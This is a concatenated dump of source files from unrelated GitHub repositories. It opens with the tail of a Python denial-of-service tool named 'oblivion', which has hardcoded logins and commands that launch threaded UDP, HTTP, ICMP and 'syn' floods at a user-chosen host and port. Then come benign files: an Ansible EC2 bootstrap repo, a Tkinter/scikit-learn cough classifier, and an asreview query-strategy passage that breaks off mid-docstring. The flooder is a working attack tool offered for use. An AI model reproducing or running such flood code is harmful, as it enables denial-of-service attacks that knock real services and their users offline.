\"attacks\":\r\n\t\t\tprint (\"[\\033[34moblivion\\033[35m] Total Attacks Running: {}\\n\".format (aid))\r\n\t\t\tmain()\r\n\t\telif sinput == \"resolve\":\r\n\t\t\tliips += 1\r\n\t\t\thost = sin.split(\" \")[1]\r\n\t\t\thost_ip = 
socket.gethostbyname(host)\r\n\t\t\tprint (\"[\\033[34moblivion\\033[35m] Host: {} \\033[34m[\\033[35mswapped\\033[34m] {}\\n\".format (host, host_ip))\r\n\t\t\tmain()\r\n\t\telif sinput == \"udp\":\r\n\t\t\tif username == \"Guest\":\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] You Are Not Allowed To Use This Method.\\n\")\r\n\t\t\t\tmain()\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\t\tthreading.Thread(target=udpsender, args=(host, port, timer, punch)).start()\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\t\tmain()\r\n\t\t\t\texcept socket.gaierror:\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\t\tmain()\r\n\t\telif sinput == \"http\":\r\n\t\t\ttry:\r\n\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\tthreading.Thread(target=httpsender, args=(host, port, timer, punch)).start()\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\tmain()\r\n\t\t\texcept socket.gaierror:\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\tmain()\r\n\t\telif sinput == \"icmp\":\r\n\t\t\tif username == \"Guest\":\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] You Are Not Allowed To Use This Method.\\n\")\r\n\t\t\t\tmain()\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\t\tthreading.Thread(target=icmpsender, args=(host, port, timer, punch)).start()\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\t\tmain()\r\n\t\t\t\texcept socket.gaierror:\r\n\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\t\tmain()\r\n\t\telif sinput == \"syn\":\r\n\t\t\ttry:\r\n\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\tthreading.Thread(target=icmpsender, args=(host, port, timer, punch)).start()\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\tmain()\r\n\t\t\texcept socket.gaierror:\r\n\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\tmain()\r\n\t\telif sinput == \"stop\":\r\n\t\t\tprint (\"[\\033[35moblivion\\033[34m] All Running Attacks Have Been Stopped.\\n\")\r\n\t\t\tattack = False\r\n\t\t\twhile not attack:\r\n\t\t\t\tif aid == 0:\r\n\t\t\t\t\tattack = True\r\n\t\telif sinput == \"stop\":\r\n\t\t\twhat = sin.split(\" \")[1]\r\n\t\t\tif what == \"udp\":\r\n\t\t\t\tprint (\"Stopping All UDP 
Attacks.\\n\")\r\n\t\t\t\tudp = False\r\n\t\t\t\twhile not udp:\r\n\t\t\t\t\tif aid == 0:\r\n\t\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] No UDP Processes Running.\")\r\n\t\t\t\t\t\tudp = True\r\n\t\t\t\t\t\tmain()\r\n\t\t\tif what == \"icmp\":\r\n\t\t\t\tprint (\"Stopping All ICMP Attacks.\\n\")\r\n\t\t\t\ticmp = False\r\n\t\t\t\twhile not icmp:\r\n\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] No ICMP Processes Running.\")\r\n\t\t\t\t\tudp = True\r\n\t\t\t\t\tmain()\r\n\t\telse:\r\n\t\t\tprint (\"[\\033[35moblivion\\033[34m] {} Is Not A Command.\\n\".format(sinput))\r\n\t\t\tmain()\r\n\r\n\r\n\r\ntry:\r\n\tusers = [\"oblivion\", \"Guest\"]\r\n\tclear = \"clear\"\r\n\tos.system (clear)\r\n\tusername = getpass.getpass (\"[+] Username: \")\r\n\tif username in users:\r\n\t\tuser = username\r\n\telse:\r\n\t\tprint (\"[+] Incorrect, Exiting.\\n\")\r\n\t\texit()\r\nexcept KeyboardInterrupt:\r\n\texit()\r\ntry:\r\n\tpasswords = [\"oblivion\", \"Guest\"]\r\n\tpassword = getpass.getpass (\"[+] Password: \")\r\n\tif user == \"oblivion\":\r\n\t\tif password == passwords[0]:\r\n\t\t\tprint (\"[+] Login Correct.\")\r\n\t\t\tprint (\"[+] Type Help To See Commands.\")\r\n\t\t\tcookie.write(\"DIE\")\r\n\t\t\ttime.sleep(3)\r\n\t\t\tos.system (clear)\r\n\t\t\ttry:\r\n\t\t\t\tos.system (\"clear\")\r\n\t\t\t\tprint (banner)\r\n\t\t\t\tmain()\r\n\t\t\texcept KeyboardInterrupt:\r\n\t\t\t\tprint (\"\\n[\\033[35moblivion\\033[34m] Ctrl-C Has Been Pressed.\\n\")\r\n\t\t\t\tmain()\r\n\t\telse:\r\n\t\t\tprint (\"[+] Incorrect, Exiting.\\n\")\r\n\t\t\texit()\r\n\tif user == \"Guest\":\r\n\t\tif password == passwords[1]:\r\n\t\t\tprint (\"[+] Login Correct.\")\r\n\t\t\tprint (\"[+] Certain Methods Will Not Be Available To You.\")\r\n\t\t\tprint (\"[+] Type Help To See Commands.\")\r\n\t\t\ttime.sleep(5)\r\n\t\t\tos.system (clear)\r\n\t\t\ttry:\r\n\t\t\t\tos.system (\"clear\")\r\n\t\t\t\tprint (banner)\r\n\t\t\t\tmain()\r\n\t\t\texcept KeyboardInterrupt:\r\n\t\t\t\tprint (\"\\n[\\033[35moblivion\\033[34m] Ctrl-C Has Been Pressed.\\n\")\r\n\t\t\t\tmain()\r\n\t\telse:\r\n\t\t\tprint (\"[+] Incorrect, Exiting.\\n\")\r\n\t\t\texit()\r\nexcept KeyboardInterrupt:\r\n\texit()\r\n" } ]
1
supernova106/ansible-puppetmaster
https://github.com/supernova106/ansible-puppetmaster
42af79e5eab897d171e6ddd52a963099af95ed36
b2eaeb5da29dd741e60785254fd1f6d94bdd23e9
8cac93b292892e1260da43cf2967d4f4d837da75
refs/heads/master
2020-06-12T10:50:30.452912
2016-12-05T10:13:46
2016-12-05T10:13:46
75,586,180
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7194244861602783, "alphanum_fraction": 0.7266187071800232, "avg_line_length": 16.375, "blob_id": "658e79d6df55b4c22b34302463b6e722ba995309", "content_id": "182dffa9c7364b04f07b7f740b5c11292ed682a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 139, "license_type": "no_license", "max_line_length": 51, "num_lines": 8, "path": "/README.md", "repo_name": "supernova106/ansible-puppetmaster", "src_encoding": "UTF-8", "text": "## Description\n- bootstraps an EC2 instance and runs some setup tasks\n\n## Debug\n- `vim /etc/ansible/hosts` to update the current server\n\n## Contact\n- Binh Nguyen\n" }, { "alpha_fraction": 0.6847826242446899, "alphanum_fraction": 0.70652174949646, "avg_line_length": 22, "blob_id": "56de8989911c6662868d5d0e9d132cf6f13aa5db", "content_id": "56b75783a1877696f1fbc0fec9c8e04cbc07603e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 92, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/env.sample", "repo_name": "supernova106/ansible-puppetmaster", "src_encoding": "UTF-8", "text": "#!/bin/bash\nexport AWS_ACCESS_KEY=''\nexport AWS_SECRET_KEY=''\nexport EC2_REGION='us-east-1'\n" }, { "alpha_fraction": 0.5724999904632568, "alphanum_fraction": 0.5774999856948853, "avg_line_length": 20.052631378173828, "blob_id": "6850d8237d41eb38c33e087702de0290bf369890", "content_id": "33acf5c3b16010fb29e56ab34e9bbbf091ad8e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 400, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/setup.py", "repo_name": "supernova106/ansible-puppetmaster", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\ntry:\n    from setuptools import setup\nexcept ImportError:\n    from distutils.core import setup\n\nsetup(name='Distutils',\n      version='1.0',\n      description='Python Distribution Utilities for ansible',\n      author='Binh Nguyen',\n      author_email='',\n      url='',\n      install_requires=[\n      \t'boto',\n      \t'pymongo',\n      \t'pyyaml',\n      \t'fluent-logger'\n      ],\n      )\n" } ]
3
ShaunMillsDev/Cough_Classifier
https://github.com/ShaunMillsDev/Cough_Classifier
545d582658ac5de41176780ccf763ebc7da1523a
b6f6e2d4658aed8b44a1d8110b61e9d38919c5c0
31322baa08ff59885e367a704bad92c0265b1d6b
refs/heads/main
2023-06-09T05:36:07.503955
2021-04-30T19:38:06
2021-04-30T19:38:06
362,807,902
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5960023999214172, "alphanum_fraction": 0.614879846572876, "avg_line_length": 47.798030853271484, "blob_id": "81d780578b89b59efedd06e363b7d1ae64d8bad6", "content_id": "16bb671dbbfdae4f198df82b4617acf9691c05fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9906, "license_type": "no_license", "max_line_length": 120, "num_lines": 203, "path": "/gui.py", "repo_name": "ShaunMillsDev/Cough_Classifier", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import filedialog as fd\nfrom PIL import Image, ImageTk\n\n# Imports to allow to call any functions from main python file, with GUI params.\nimport main\n\n\n# Main class\nclass Application:\n def __init__(self, master):\n # Write GUI only functions here:\n\n # Initialize title bar variables\n lastClickX = 0\n lastClickY = 0\n\n # Saves last click position for custom title bar.\n def SaveLastClickPos(event):\n global lastClickX, lastClickY\n lastClickX = event.x\n lastClickY = event.y\n\n # Allows dragging the title bar window.\n def Dragging(event):\n x, y = event.x - lastClickX + root.winfo_x(), event.y - lastClickY + root.winfo_y()\n root.geometry(\"+%s+%s\" % (x, y))\n\n # Example internal function\n def gui_only_function():\n pass\n\n # Custom title bar\n title_bar = Frame(master, bg='#2e2e2e', relief='raised', bd=2, highlightthickness=0)\n # Close button for title bar\n close_application = Button(title_bar, text='X', command=master.destroy, bg=\"#2e2e2e\", padx=2, pady=2,\n activebackground='red', bd=0, font=\"bold\", fg='white', highlightthickness=0)\n\n # Favicon Icon - Initializes the asset.\n favicon = Image.open(\"assets/logo.jpg\")\n favicon = favicon.resize((25, 25))\n\n # Converts the favicon asset to a Tkinter PhotoImage\n favicon_icon = ImageTk.PhotoImage(favicon)\n favicon_label = Label(title_bar, image=favicon_icon, borderwidth=0, highlightthickness=0)\n favicon_label.photo = favicon_icon\n favicon_label.pack(side=LEFT)\n\n # Title text for the label\n title_bar_text_label = Label(title_bar, text=\"Cough Classifier\", bg=\"#2e2e2e\", fg=\"#fff\", font=(\"Hind\", 10),\n padx=3)\n title_bar_text_label.pack(side=LEFT)\n\n title_bar.pack(expand=1, fill=X)\n close_application.pack(side=RIGHT)\n\n # Binds button 1 to two functions for clicking and dragging custom title bar.\n title_bar.bind('<Button-1>', SaveLastClickPos)\n title_bar.bind('<B1-Motion>', Dragging)\n\n # Creates master Canvas (not a frame)\n window = Canvas(master, width=\"800\", height=\"600\", bg='#2e2e2e', highlightthickness=0)\n window.pack(fill=BOTH)\n\n # Header frame\n header_frame = Frame(window, bg=\"#2e2e2e\")\n window.create_window((0, 0), window=header_frame, anchor=\"nw\", height=220, width=800)\n\n header_image = Image.open(\"assets/header.jpg\")\n header_image = header_image.resize((180, 220))\n header_image_tk = ImageTk.PhotoImage(header_image)\n header_image_label = Label(header_frame, image=header_image_tk, borderwidth=0, highlightthickness=0)\n header_image_label.photo = header_image_tk\n header_image_label.pack(anchor='center')\n\n # Options Left frame\n options_left_frame = Frame(window, bg=\"#2e2e2e\", relief='groove', bd=1, highlightthickness=0)\n window.create_window((0, 225), window=options_left_frame, anchor=\"nw\", height=249, width=400)\n\n upload_image = Image.open(\"assets/upload_test_data.jpg\")\n upload_image = upload_image.resize((225, 40))\n upload_image_tk = ImageTk.PhotoImage(upload_image)\n upload_image_label = 
Label(options_left_frame, image=upload_image_tk, borderwidth=0, highlightthickness=0)\n upload_image_label.photo = upload_image_tk\n upload_image_label.pack(anchor='center', pady=5)\n\n # Upload Test Cough Data\n def test_upload_cough_sound():\n location = \"Sound_Folders/Test_Sounds/Cough_Test_Sounds/\"\n filetypes = [(\"Cough Sounds\", \".wav\")]\n test_upload_cough_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n\n main.copy_uploaded_files_to_cough_test(test_upload_cough_sound_assets, location)\n\n # Upload Test Ambient Data\n def test_upload_ambient_sound():\n location = \"Sound_Folders/Test_Sounds/Non_Cough_Test_Sounds/\"\n filetypes = [(\"Ambient Sounds\", \".wav\")]\n test_upload_ambient_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n main.copy_uploaded_files_to_cough_test(test_upload_ambient_sound_assets, location)\n\n # Upload Classifier Cough Data\n def classifier_upload_cough_sound():\n location = \"Sound_Folders/Cough_Recordings/\"\n filetypes = [(\"Cough Sounds\", \".wav\")]\n classifier_upload_cough_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n main.copy_uploaded_files_to_cough_test(classifier_upload_cough_sound_assets, location)\n\n # Upload Classifier Ambient Data\n def classifier_upload_ambient_sound():\n location = \"Sound_Folders/Training_Sounds/\"\n filetypes = [(\"Ambient Sounds\", \".wav\")]\n classifier_upload_ambient_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n main.copy_uploaded_files_to_cough_test(classifier_upload_ambient_sound_assets, location)\n\n # Right/Left frame images\n\n image_cough = Image.open(\"assets/cough_button.jpg\")\n image_cough = image_cough.resize((155, 45), Image.ANTIALIAS)\n self.reset_img_cough = ImageTk.PhotoImage(image_cough)\n\n image_ambient = Image.open(\"assets/ambient_button.jpg\")\n image_ambient = image_ambient.resize((155, 45), Image.ANTIALIAS)\n self.reset_image_ambient = ImageTk.PhotoImage(image_ambient)\n\n # Buttons to upload test sound data\n test_upload_cough_sound_button = Button(options_left_frame, text=\"Upload Coughs\", image=self.reset_img_cough,\n command=test_upload_cough_sound, bg='#05345C')\n test_upload_cough_sound_button.pack(anchor='center', pady=20)\n\n test_upload_ambient_sound_button = Button(options_left_frame, text=\"Upload Ambient\",\n image=self.reset_image_ambient, command=test_upload_ambient_sound,\n bg='#05345C')\n test_upload_ambient_sound_button.pack(anchor='center', pady=20)\n\n # Options Right frame\n options_right_frame = Frame(window, bg=\"#2e2e2e\", relief='groove', bd=1, highlightthickness=0)\n window.create_window((400, 225), window=options_right_frame, anchor=\"nw\", height=249, width=401)\n\n options_image = Image.open(\"assets/upload_classifier_data.jpg\")\n options_image = options_image.resize((225, 40))\n options_image_tk = ImageTk.PhotoImage(options_image)\n options_image_label = Label(options_right_frame, image=options_image_tk, borderwidth=0, highlightthickness=0)\n options_image_label.photo = options_image_tk\n options_image_label.pack(anchor='center', pady=5)\n\n # Buttons to upload Classifier sound data\n classifier_upload_cough_sound_button = Button(options_right_frame, text=\"Upload Coughs\",\n image=self.reset_img_cough, command=classifier_upload_cough_sound,\n bg='#05345C')\n classifier_upload_cough_sound_button.pack(anchor='center', 
pady=20)\n\n        classifier_upload_ambient_sound_button = Button(options_right_frame, text=\"Upload Ambient\",\n                                                        image=self.reset_image_ambient,\n                                                        command=classifier_upload_ambient_sound, bg='#05345C')\n        classifier_upload_ambient_sound_button.pack(anchor='center', pady=20)\n\n        # Footer frame\n        footer_frame = Frame(window, bg=\"#2e2e2e\", relief='groove', bd=1, highlightthickness=0)\n        window.create_window((0, 470), window=footer_frame, anchor=\"nw\", height=100, width=801)\n\n        # Button footer images\n        image_execute = Image.open(\"assets/execute_test.jpg\")\n        image_execute = image_execute.resize((180, 52), Image.ANTIALIAS)\n        self.reset_image_execute = ImageTk.PhotoImage(image_execute)\n\n        image_train = Image.open(\"assets/train_model.jpg\")\n        image_train = image_train.resize((180, 52), Image.ANTIALIAS)\n        self.reset_image_train = ImageTk.PhotoImage(image_train)\n\n        image_record = Image.open(\"assets/record_audio.jpg\")\n        image_record = image_record.resize((180, 52), Image.ANTIALIAS)\n        self.reset_image_record = ImageTk.PhotoImage(image_record)\n\n        # Buttons for Footer\n\n        run_test = Button(footer_frame, text=\"Execute Test\", relief=\"flat\",\n                          image=self.reset_image_execute, command=main.runTest)\n        run_test.pack(side=LEFT, padx=40)\n\n        record_audio = Button(footer_frame, text=\"Record Audio\", image=self.reset_image_record, relief=\"flat\",\n                              command=main.recordAudio)\n        record_audio.pack(side=LEFT, padx=40)\n\n        train_data = Button(footer_frame, text=\"Train the Classifier\", image=self.reset_image_train, relief=\"flat\",\n                            command=main.trainData)\n        train_data.pack(side=LEFT, padx=40)\n\n\n# Initialize GUI\nroot = Tk()\napp = Application(root)\nroot.title('Cough Classifier')\n# Sets window size\nroot.geometry(\"800x600\")\n# Overrides tkinter styling (for title bar)\nroot.overrideredirect(True)\nroot.attributes('-topmost', True)\nroot.mainloop()\n" }, { "alpha_fraction": 0.6102316975593567, "alphanum_fraction": 0.6186183094978333, "avg_line_length": 29.091482162475586, "blob_id": "68d9ce2e506b9a86314f754d99549daf90bbb9ce", "content_id": "b9b12df48675ea659d9e45fe29e62e3daa6bf126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9539, "license_type": "no_license", "max_line_length": 105, "num_lines": 317, "path": "/main.py", "repo_name": "ShaunMillsDev/Cough_Classifier", "src_encoding": "UTF-8", "text": "import os\r\nimport csv\r\nimport shutil\r\nimport librosa\r\nimport librosa.display\r\nimport numpy as np\r\nimport pyaudio\r\nimport wave\r\nimport time\r\nimport requests\r\nimport soundfile as sf\r\nimport tkinter as tk\r\nfrom tkinter.messagebox import showinfo\r\nfrom tkinter import *\r\n\r\n# import matplotlib.pyplot as plt\r\n# import IPython.display as ipd\r\n\r\nimport random\r\nimport pandas as pd\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn import preprocessing\r\nfrom sklearn.svm import SVC\r\n\r\n# from sklearn import neighbors, datasets\r\n# from sklearn.preprocessing import StandardScaler\r\n# from sklearn.linear_model import LinearRegression\r\n# from sklearn.metrics import accuracy_score\r\n# from sklearn.metrics import mean_squared_error, r2_score\r\n\r\ntrain_list = []\r\ntest_list = []\r\n\r\n\r\n# create initial CSV files with a feature header\r\ndef createCSV(header, mfcc_count, label, file_location):\r\n    header = header\r\n    for i in range(1, mfcc_count + 1):\r\n        header += f' mfcc{i}'\r\n    if label:\r\n        header += ' label'\r\n    header = header.split()\r\n\r\n    file = open(file_location, 'w', newline='')\r\n    with file:\r\n        writer = csv.writer(file)\r\n        
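# one header row: mfcc_count feature columns (callers pass 39 = 13 MFCCs + 13 deltas + 13 delta-deltas) plus a trailing label column when label=True\r\n        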
writer.writerow(header)\n\n\n# iterate through directory, extract mfccs and labels, save to dataset_location\ndef createInitialSet(directory, trim, threshold, dataset_location, is_cough, include_filename):\n i = 0\n if len(os.listdir(directory)) == 0:\n print(directory, ' is empty')\n else:\n for file in os.listdir(directory):\n audio_path = directory + '/' + file\n\n if include_filename:\n to_append = file\n else:\n to_append = ''\n\n # load file\n x, sr = librosa.load(audio_path)\n\n if trim:\n x_trim, index = librosa.effects.trim(x, threshold)\n\n # Generate MFCCs\n if trim:\n m = librosa.feature.mfcc(x_trim, n_mfcc=13, sr=sr)\n dm = librosa.feature.delta(m)\n mfccs = librosa.feature.delta(m, order=2)\n else:\n m = librosa.feature.mfcc(x, n_mfcc=13, sr=sr)\n dm = librosa.feature.delta(m)\n mfccs = librosa.feature.delta(m, order=2)\n\n # create row with label\n for e in m:\n to_append += f' {np.mean(e)}'\n for e in dm:\n to_append += f' {np.mean(e)}'\n for e in mfccs:\n to_append += f' {np.mean(e)}'\n\n if is_cough == 1:\n to_append += ' 1'\n elif is_cough == 2:\n to_append += ' 0'\n\n # write to csv dataset file\n dataset = open(dataset_location, 'a', newline='')\n with dataset:\n writer = csv.writer(dataset)\n writer.writerow(to_append.split())\n i += 1\n print('Features successfully extracted from: ', audio_path)\n\n\n# store a set (the_list) into a csv file (filename)\ndef storeSet(filename, the_list, num_samples, mfcc_count):\n print('\\n\\n', filename, ': ', len(the_list), ' recordings -->\\n')\n\n to_append = ''\n\n for x in range(num_samples):\n for y in range(1, mfcc_count + 2):\n to_append += f' {the_list[x].iloc[y]}'\n\n print(the_list[x].iloc[0])\n\n set = open(filename, 'a', newline='')\n with set:\n writer = csv.writer(set)\n writer.writerow(to_append.split())\n\n to_append = ''\n\n\n# train on the training and test set, output accuracy\ndef train(mfcc_count, training_name, testing_name, label_known):\n results = []\n svc = SVC(kernel='linear')\n\n # load the training and test sets\n datasets_train = pd.read_csv(training_name)\n datasets_test = pd.read_csv(testing_name)\n\n train_mfccs = datasets_train.iloc[:, 0:mfcc_count]\n train_labels = datasets_train.iloc[:, -1]\n\n test_mfccs = datasets_test.iloc[:, 0:mfcc_count]\n if label_known:\n test_labels = datasets_test.iloc[:, -1]\n\n # preprocessing by scaling\n scaler = preprocessing.StandardScaler().fit(train_mfccs)\n train_mfccs_scaled = scaler.transform(train_mfccs)\n test_mfccs_scaled = scaler.transform(test_mfccs)\n\n # from sklearn.feature_selection import RFE\n # rfe = RFE(estimator=svc, n_features_to_select=1, step=1)\n\n # Fit the model\n svc.fit(train_mfccs_scaled, train_labels)\n\n # Predict\n prediction = svc.predict(test_mfccs_scaled)\n\n print('\\n', svc.n_support_)\n\n if label_known:\n print('\\nPrediction vs Actual Label')\n print('--------------------------')\n\n for i in range(len(test_labels)):\n result = 'Prediction: ' + str(prediction[i]) + ' : Actual label: ' + str(test_labels.iloc[i])\n results.append(result)\n\n # Model Accuracy: how often is the classifier correct?\n result = \"Accuracy: \" + str(metrics.accuracy_score(test_labels, prediction) * 100) + '%'\n results.append(result)\n else:\n if int(prediction[0]) == 0:\n results.append('Prediction: NOT Cough')\n elif int(prediction[0]) == 1:\n results.append('Prediction: Cough')\n\n return results\n\n\n# combine cough_test_sounds and non_cough_test_sounds into one testing_set.csv file\ndef combine_test_data(label_known):\n if not label_known:\n 
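# unlabeled path: featurise the single clip captured by record_audio(); is_cough=3 means no label column is written\r\n        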
createInitialSet('Sound_Folders/Test_Sounds/Test_Sound',\n True, 30, 'Datasets/testing_set.csv', 3, False)\n else:\n createInitialSet('Sound_Folders/Test_Sounds/Cough_Test_Sounds',\n True, 30, 'Datasets/testing_set.csv', 1, False)\n createInitialSet('Sound_Folders/Test_Sounds/Non_Cough_Test_Sounds',\n False, 0, 'Datasets/testing_set.csv', 2, False)\n\n\n# test model on new test data from Test_Sounds folders\ndef test_new_data(file_path, label_known, mfcc_count):\n # test new data when model is already trained\n if label_known:\n createCSV('', mfcc_count, True, 'Datasets/testing_set.csv')\n else:\n createCSV('', mfcc_count, False, 'Datasets/testing_set.csv')\n\n combine_test_data(label_known)\n results = train(mfcc_count, 'Datasets/training_set.csv', 'Datasets/testing_set.csv', label_known)\n\n if not label_known:\n if os.path.exists(file_path):\n os.remove(file_path)\n\n return results\n\n\n# record audio\ndef record_audio():\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n CHANNELS = 2\n RATE = 22050\n RECORD_SECONDS = 3\n\n WAVE_OUTPUT_FILENAME = r\"Sound_Folders/Test_Sounds/Test_Sound/output\" + str(time.time()) + \".wav\"\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n print(\"\\n-- recording for 3 seconds --\")\n\n frames = []\n\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n\n print(\"-- done recording --\\n\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n return WAVE_OUTPUT_FILENAME\n\n\n# randomise the data, create train_list & test_list\ndef randomiseOrder(dataset_location, num_train_samples):\n dataset = pd.read_csv(dataset_location)\n\n # randomise the data and create training set\n while len(train_list) < num_train_samples:\n random_index = random.randint(0, len(dataset) - 1)\n random_sample = dataset.iloc[random_index]\n train_list.append(random_sample)\n\n i = dataset[(dataset.filename == random_sample.iloc[0])].index\n dataset.drop(i, inplace=True)\n dataset.reset_index(drop=True, inplace=True)\n\n # set remaining data to test set\n current_index = 0\n while current_index < len(dataset):\n sample = dataset.iloc[current_index]\n test_list.append(sample)\n current_index += 1\n\n\n# train model and test\ndef train_and_test(mfcc_count):\n # create CSV files for dataset, training set, testing set (boolean label)\n createCSV('filename', mfcc_count, True, 'Datasets/dataset.csv')\n createCSV('', mfcc_count, True, 'Datasets/training_set.csv')\n createCSV('', mfcc_count, True, 'Datasets/testing_set.csv')\n\n # create mfcc sets (boolean trimming)\n createInitialSet('Sound_Folders/Cough_Recordings', True, 30, 'Datasets/dataset.csv', 1, True)\n createInitialSet('Sound_Folders/Training_Sounds', False, 0, 'Datasets/dataset.csv', 2, True)\n\n # randomise the data order\n randomiseOrder('Datasets/dataset.csv', 112)\n\n # store the randomised and categorised sets back as separate csv files\n storeSet('Datasets/training_set.csv', train_list, 112, mfcc_count)\n storeSet('Datasets/testing_set.csv', test_list, 28, mfcc_count)\n\n # train\n train(mfcc_count, 'Datasets/training_set.csv', 'Datasets/testing_set.csv', True)\n\n\ndef recordAudio():\n path = record_audio()\n results = test_new_data(path, False, 39)\n showinfo(\"Window\", 
results[0])\n\n\ndef runTest():\n results = test_new_data('', True, 39)\n results_string = ''\n\n for e in results:\n results_string += str(e) + '\\n'\n showinfo(\"Results\", results_string)\n\n\ndef trainData():\n train_and_test(39)\n\n\ndef test_function():\n print(\"Hello World!\")\n\n\ndef copy_uploaded_files_to_cough_test(list_of_files, location):\n for file in list_of_files:\n shutil.copy(file, location)\n" } ]
2
terrymyc/asreview
https://github.com/terrymyc/asreview
7cc689a017d69205a54dc4693978cc6def35a4bd
f2b5e778560121c508fdfca2080f975df2180c17
93407152ec74c5773a1883aa53707c27d147f534
refs/heads/master
2023-08-24T00:15:26.022593
2023-08-10T13:46:49
2023-08-10T13:46:49
237,174,244
0
0
Apache-2.0
2020-01-30T08:56:39
2021-12-16T13:30:52
2022-05-20T20:10:47
Python
[ { "alpha_fraction": 0.6104651093482971, "alphanum_fraction": 0.629123866558075, "avg_line_length": 35.7960205078125, "blob_id": "12057738f7a6b36427972f55ecebcf9a4153e5a7", "content_id": "c21e32aa952b8c6aa8f55a7a2bda535ea89269fa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7396, "license_type": "permissive", "max_line_length": 88, "num_lines": 201, "path": "/asreview/models/query/mixed.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\n\nfrom asreview.models.query.base import BaseQueryStrategy\nfrom asreview.models.query.utils import get_query_model\nfrom asreview.utils import get_random_state\n\n\ndef _parse_mixed_kwargs(kwargs, strategy_name):\n    kwargs_new = {}\n    for key, value in kwargs.items():\n        if key.startswith(strategy_name):\n            new_key = key[len(strategy_name) + 1 :]\n            kwargs_new[new_key] = value\n\n    return kwargs_new\n\n\nclass MixedQuery(BaseQueryStrategy):\n    \"\"\"Mixed query strategy.\n\n    Use two different query strategies at the same time with a\n    ratio of one to the other. For\n    example mixing max and random sampling with a mix ratio of 